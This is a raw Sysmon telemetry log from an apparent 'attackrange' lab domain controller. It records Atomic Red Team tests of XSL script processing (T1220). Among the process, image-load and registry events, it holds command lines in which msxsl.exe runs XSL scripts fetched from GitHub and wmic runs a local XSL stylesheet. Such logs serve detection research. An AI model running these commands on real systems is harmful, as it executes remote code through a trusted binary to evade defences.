12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057348324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 12241200x800000000000000057348323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.574{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.574{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057348320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.558{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.558{8B6011A9-5BAB-618E-58F3-04000000F101}93048868C:\Windows\system32\cmd.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057348318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.563{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic process list /FORMAT:"C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "wmic process list /FORMAT:"C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl"" 734700x800000000000000057348317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.543{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\System32\cmd.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057348316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.543{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057348315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.543{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\System32\cmd.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057348314Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.543{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\System32\cmd.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057348313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.538{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\System32\cmd.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057348312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.538{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|UNKNOWN(00007FFCBCEFB383) 734700x800000000000000057348311Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.538{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2trueMicrosoft WindowsValid 10341000x800000000000000057348310Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.520{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.520{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257223a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25720a1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25fb1d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+256a327(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303aba9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|UNKNOWN(00007FFCBCFB2118) 154100x800000000000000057348308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.485{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "wmic process list /FORMAT:"C:\AtomicRedTeam\atomics\T1220\src\wmicscript.xsl"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000057348307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.504{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057348306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.504{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FA1271AB40DE62FACF6041F246A5A51,SHA256=0E328C3A3494A256EA0B437A18313072A9323C50CD7C3AF35A2388AC6FA651D3falsetrue 11241100x800000000000000057348305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.473{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.473{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D2B56C980576AD19D239190E7C4B9C3A,SHA256=A10924299DE23C276ADE1BC938D74F9B40270D3F863A4897346D1C5A7311CF3Afalsetrue 11241100x800000000000000057348303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.473{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-11-12 12:18:51.085 11241100x800000000000000057348302Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.473{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-11-12 12:18:51.085 23542300x800000000000000057348301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.404{8B6011A9-C6FA-616E-9B35-01000000F101}300ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=848871CB834BF986C407FEDB5AC1A41E,SHA256=C792CC72189F5A278C0EE412ABC286EE696848F02562D85CA56715E97F96774Efalsetrue 11241100x800000000000000057348300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.388{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.388{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=11C2BA43E90BECD1E0DB7164CA1B1DC6,SHA256=C4F2F278A8788265606D362B3913426D440EECA2DAA863CB075F3A45ADB21DEFfalsetrue 534500x800000000000000057348298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.357{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\System32\cmd.exe 734700x800000000000000057348297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.357{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\System32\cmd.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 10341000x800000000000000057348296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.357{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000021219867Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:19:37.658{AD5E2759-54CF-6143-D400-00000000F101}3540C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-874.attackrange.local64342-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 734700x800000000000000057348295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.342{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\System32\cmd.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057348294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.342{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\System32\cmd.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 10341000x800000000000000057348293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.342{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|UNKNOWN(00007FFCBCEFB383) 734700x800000000000000057348292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.342{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\System32\cmd.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057348291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.342{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2trueMicrosoft WindowsValid 10341000x800000000000000057348290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.342{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057348289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.342{8B6011A9-C6FA-616E-9B35-01000000F101}3006716C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+257223a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25720a1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+25fb1d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+256a327(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+303aba9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+252f8cf(wow64)|UNKNOWN(00007FFCBCFB2118) 154100x800000000000000057348288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.311{8B6011A9-5BAB-618E-57F3-04000000F101}7332C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000057348287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.304{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-11-12 12:18:51.085 11241100x800000000000000057348286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.304{8B6011A9-C6FA-616E-9B35-01000000F101}300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-11-12 12:18:51.085 23542300x800000000000000057348285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.242{8B6011A9-C6FA-616E-9B35-01000000F101}300ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=848871CB834BF986C407FEDB5AC1A41E,SHA256=C792CC72189F5A278C0EE412ABC286EE696848F02562D85CA56715E97F96774Efalsetrue 11241100x800000000000000057348284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.220{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_Operational2021-09-16 14:17:52.179 23542300x800000000000000057348283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.220{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=080CC37825E22911D62F09C4F37BC21E,SHA256=C016057D10AF6EC76FBE8AE411D5257CA008D5EA4C2CC8881EE1038FED902744falsetrue 534500x800000000000000057348282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.157{8B6011A9-5BAB-618E-56F3-04000000F101}1984C:\Windows\System32\cmd.exe 12241200x800000000000000057348281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.157{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 